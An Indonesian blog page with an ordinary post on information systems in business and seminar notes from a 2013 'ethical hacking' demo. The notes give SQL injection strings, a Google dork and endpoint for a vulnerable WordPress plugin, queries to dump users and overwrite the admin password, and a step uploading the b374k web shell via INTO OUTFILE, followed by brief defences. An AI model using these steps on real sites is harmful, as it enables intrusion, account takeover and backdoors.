This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Minggu, 31 Maret 2013

KONSEP – KONSEP DASAR SISTEM INFORMASI DALAM BISNIS!




KONSEP – KONSEP DASAR SISTEM INFORMASI DALAM BISNIS!

Teknologi informasi, termasuk sistem informasi berbasis internet, memainkan peranan penting dalam bisnis. Teknologi informasi dapat membantu segala jenis bisnis, meningkatkan efisiensi dan efektifitas proses bisnis mereka, pengambilan keputusan manajerial, dan kerjasama kelompok kerja, hingga dapat memperkuat posisi kopentitif mereka dalam pasar yang cepat sekali berubah. Hal ini berlaku ketika teknologi informasi digunakan untuk mendukung tim pengembangan produk, proses dukungan untuk pelanggan, transaksi e-commerce, atau dalam
aktivitas bisnis lainnya.

Ada 5 area yang dipusatkan ke dalam sistem informasi yaitu :
1. Konsep – konsep dasar
Konsep dasar keprilakuan, teknis, bisnis, dan manajerial termasuk mengenai berbagai
komponen dan peran sistem informasi. Contohnya meliputi konsep sistem informasi dasar
yang berasal dari teori sistem umum, atau konsep keunggulan kompetitif yang digunakan
untuk mengembangkan aplikasi bisnis teknologi informasi dalam keunggulan kompetitif.

2. Teknologi informasi
Konsep - konsep utama, pengembangan, dan berbagai isu manajemen teknologi informasi
yaitu meliputi hardware, software, jaringan, manajemen data, dan banyak teknologi
berbasis internet.

3. Aplikasi bisnis
Penggunaan utama dari sistem informasi untuk operasi, manajemen dan keunggulan kompetitif bisnis.

4. Proses pengembangan
Bagaimana para praktisi bisnis dan pakar informasi merencanakan, mengembangkan, dan
mengimplementasikan sistem informasi untuk memenuhi peluang bisnis.

5. Tantangan manajemen
Tantangan untuk secara efektif dan etis mengelola teknologi informasi pada tingkat pemakai akhir, perusahaan, dan global dalam bisnis.

DALAM DUNIA BISNIS

Dalam  dunia  bisnis,  teknologi  informasi  mempunyai  pengaruh  yang  nyata,  transaksi 
bisnis dicatat secara on-line, diolah dan  pada saat yang hampir bersamaan (real-time) 
hasil  pengolahan  atau  informasi  dapat  dilihat,  seperti  yang  lazim  dilakukan  para 
nasabah bank  pada  saat melakukan  transaksi pada ATM  (automated  teller machine). 
Selain  itu,  teknologi  informasi  juga dimanfaatkan untuk perdagangan secara elektronik 
atau  dikenal  sebagai  E-Commerce.  E-Commerce  adalah  perdagangan menggunakan 
jaringan komunikasi internet.  
Sistem E-commerce dapat diklasifikasikan kedalam 3 (tiga) tipe aplikasi berikut, yaitu : 


a.  Electronic  Markets  (EMs)
yaitu  sebuah  sarana  yang  menggunakan  teknologi 
informasi  dan  komunikasi  untuk  melakukan  atau  menyajikan  penawaran  dalam 
sebuah  segmen  pasar,  sehingga  pembeli  dapat membandingkan  berbagai macam 
harga yang ditawarkan. Dalam pengertian lain, EMs adalah sebuah sistem informasi 
antar organisasi yang menyediakan  fasilitas-fasilitas bagi para penjual dan pembeli 
untuk bertukar informasi tentang harga dan produk yang ditawarkan.



b.Elektronic  Data  Interchange  (EDI)
adalah  sarana  untuk  mengefisienkan 
pertukaran  data  transaksi-transaksi  regular  yang  berulang  dalam  jumlah  besar 
antara  organisasi-organisasi  komersial.  Secara  formal,  EDI  didefinisikan  oleh 
International  Data  Exchabge  Association  (IDEA)  sebagai  transfer  data  terstruktur 
dengan  format  standard  yang  telah  disepakati,  yang  dilakukan  dari  satu  sistem 
komputer  ke  sistem  komputer  lain  dengan  menggunakan  media  elektronik .  EDI 
sangat luas penggunaaanya, biasanya digunakan oleh kelompok retail besar, ketika 
melakukan  transaksi bisnis dengan para supplier mereka. EDI memiliki standarisasi 
pengkodean  transaksi  perdagangan,  sehingga  organisasi  komersial  tersebut  dapat 
berkomunikasi secara langsung dari satu sistem komputer ke sistem komputer yang 
lain,  tanpa memerlukan  hardcopy  atau  faktur,  sehingga  terhindar  dari  penundaan, 
kesalahan  yang  tidak  disengaja  dalam  penanganan  berkas  dan  intervensi  dari 
manusia.  


c.  Internet Commerce
adalah penggunaan internet yang berbasis teknologi informasi 
dan  komunikasi  untuk  aktivitas  perdagangan.  Kegiatan  komersial  ini,  seperti  iklan 
dalam penjualan produk dan jasa. Transaksi yang dapat dilakukan di internet, antara 
lain pemesanan/pembelian barang dimana barang akan dikirimkan melalui pos atau 
sarana lain setelah uang ditransfer ke rekening penjual.


Di samping  itu  teknologi  informasi memiliki banyak peranan dalam membantu manusia 
dan memecahkan masalah. Membantu manusia dalam :  
o  meningkatkan produktivitas,  
o  meningkatkan efektivitas,  
o  meningkatkan efisiensi,  
o  meningkatkan mutu,  
o  meningkatkan kreativitas,  
o  problem solving (pemecahan masalah).   
Tanggung  jawab  pemakai   teknologi  informasi  akan memberikan  peran  yang  penting 
dalam  memaksimalkan  kinerja  teknologi  informasi.  Peran  yang  dimainkan   pemakai 
adalah tahu  cara  menggunakan  teknologi  informasi  dan  keterbatasannya  dalam 
berbagai situasi, pemakai harus dapat menggunakan teknologi  informasi dengan benar 
dan beretika sehingga tidak melanggar hak, privasi dan keberadaan orang lain, pemakai 
harus melindungi data dan  informasi yang berada di dalam sistem komputer atau yang 
dikirim melalui jaringan, dari kehilangan dan kerusakan        

Sabtu, 02 Maret 2013

Rangkaian Full Acara Gebyar ICT HMJTI UIN Malang 2013 Dan Seminar + Demo Hacking With Yogyafree


Materi-materi yang disampaikan :

Teka-Teki Report Password

Pemahaman dasar ethical hacker


Keamanan komputer menjadi penting?
-Perkembangan komputer
-Ketergantungan manusia
-Tuntutan kompleksitas semakin tinggi
-Keamanan menjadi anak tiri
-Kemampuan orang disebut hacker menjadi menurun
-Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum


Terminologi hacker


uVulnerability
uThreat
uAttack
uExploit

Contoh Situs yang menyediakan exploits

uMetasploit Frameworks
uExploit-db.com
usecurityfocus.com
uDarkc0de.com
upacketstormsecurity.org

Element-element keamanan (CIA)
uConfidentialityKeamanan 
informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
uIntegrity / integritas
Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
uAvailability
Keamanan informasi data untuk ketersediaan atau keberadaannya

Pengelompokkan hacker
uBlack Hat Hacker
uWhite Hat Hacker
uGrey Hat Hacker
uSuicide Hacker

Tahapan aktifitas Hacking
uReconnaissance
uScanning
uGaining Acces
uMaintaining acces
uCovering Tracks

Reconnaissance
Reconnaissance Passive
uPencarian data target di google
uPencarian data target di berbagai jejaring sosial

Reconnaissance Active
uHTTP Fingerprint

Pencarian exploit berdasarkan scanning
uGoogle.com
uArchive Milw0rm
uArchive Exploit DB
uMetasploit Framework
uDarkc0de 


Gaining Acces
uExploitasi Remote Execution pada celah keamanan OS
uExploitasi Remote Execution pada celah keamanan aplikasi
uExploitasi Remote Execution pada celah keamanan web

Maintaining Acces
PHP Backdoor
uSimple php shell
uR57
uC99 / C100
uASP Backdoor
uB374K

Covering tracks
uPembersihan berbagai exploit atau software yang diupload
uPembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.

Konsep

GET dan POST
uGET : www.site.com/form.php?nama=zae
uPOST : www.site.com/form.php

IMPLEMENTASI pada method GET & POST
uLangsung dari URL
uHeader : Content-Type: application/x-www-form-urlencoded
uData : variable=value

Query
u$query = “SELECT * FROM contoh WHERE nama =’$username’”;
u$username = dari GET atau POST

SQL Injection

u$query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --

u$query = “SELECT namaTabel FROM contoh WHERE nama =‘terserahOR ‘x’ = ‘x”;

Vulnerability Info
uDescription : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
uVersion : 2.7.1 - 3.0.1
uDate : 26-05-2012
uGoogle Dork : inurl:/wp-content/plugins/store-locator-le/
uAuthor : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
uhttp://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php

POST Method, Advanced REST Client
uMethod : POST
uHeader : Content-Type: application/x-www-form-urlencoded
uData : query=[injection]
uContoh:

query=SELECT * FROM wp_users

Mengatasi Teka-Teki Hash
Jangan hanya melihat database, do something!

UPDATE – replace password
UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;

Mengganti password menjadipassword

Upload b374k via Query
SELECT ’[kode script]INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php+ diganti %2B

Base 64 Encryption

Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)

PENGAMANAN
Update CMS, plugin
Menggunakan mysql_real_escape_string()
Memberikan validasi pada tiap inputan
Berikan length limit pada inputan
Config database error report
Setting php.ini
dll

lebih lengkapnya download di sini di sini.